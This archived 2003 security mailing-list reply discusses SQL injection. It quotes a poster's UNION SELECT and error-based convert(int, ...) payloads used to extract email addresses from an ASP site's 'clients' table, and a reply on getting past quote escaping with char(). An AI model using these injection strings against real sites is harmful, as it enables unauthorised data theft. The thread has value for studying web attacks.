Re: SQL injection - get more values

From: Kevin Spett (kspett@spidynamics.com)
Date: Thu Feb 13 2003 - 10:19:07 EST

• Next message: Per Niila Albinsson: "Re: Vulnebrability level definition"
• Previous message: Alfred Huger: "Summary of the responses (4 line ad)"
• In reply to: Thaidn: "Re: SQL injection - get more values"
• Next in thread: Brass, Phil (ISS Atlanta): "RE: SQL injection - get more values"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

First of all, this is not just for ASP/IIS. It works across many different
platforms. Also, you should be able to do this against an app server that
escapes quotes if the query you're in doesn't wrap the user input in quotes
to begin with by building strings using the char() function.

Kevin Spett
SPI Labs
http://www.spidynamics.com/

> note: this only works in ASP/IIS, not work in CFM application because CFM
> escapes all " ' " in the query string, when I replace " ' " by " '' ",
> sometimes it works but not always.
> hehe, sorry for my english :D.
> Hope this helpful.

On Thursday 13 February 2003 12:48 am, Daniel Savi wrote:
> Hi :)
>
> i'm trying to get some info from clients table and email field....
>
> i try this param into gubpage.asp?=...
> ') union select sum(email) from clients--
> and got error about all queries needed...so, i tryed to solve with
> ') union select sum(email),1,1,1.... from clients--
> until i get: operand type clash: text is incompatible with int
>
> i found this answer into this forum (thanks :)), was:
> ' %2b convert(int, (SELECT email FROM clients WHERE email > 'a')) %2b '
>
> i got this:
> Syntax error converting the varchar value 'anon@isp.com' to a column of
> data type int
>
> Now, my problem: How can i get other e-mail from table knowing one valid
> value?
>
> i try this
> ' %2b convert(int, (SELECT email FROM clients WHERE email
>
> > 'anon@isp.com')) %2b '
>
> but no success
>
> i think i can use NOT iN, but not sure how to use with convert...
>
> Any tip are welcome!
>
> Thanks
>
> --------------------------------------------------------------------------
-
>- This list is provided by the SecurityFocus Security Intelligence Alert
> (SIA) Service. For more information on SecurityFocus' SIA service which
> automatically alerts you to the latest security vulnerabilities please
see:
> https://alerts.securityfocus.com/

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/

• Next message: Per Niila Albinsson: "Re: Vulnebrability level definition"
• Previous message: Alfred Huger: "Summary of the responses (4 line ad)"
• In reply to: Thaidn: "Re: SQL injection - get more values"
• Next in thread: Brass, Phil (ISS Atlanta): "RE: SQL injection - get more values"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:28 EDT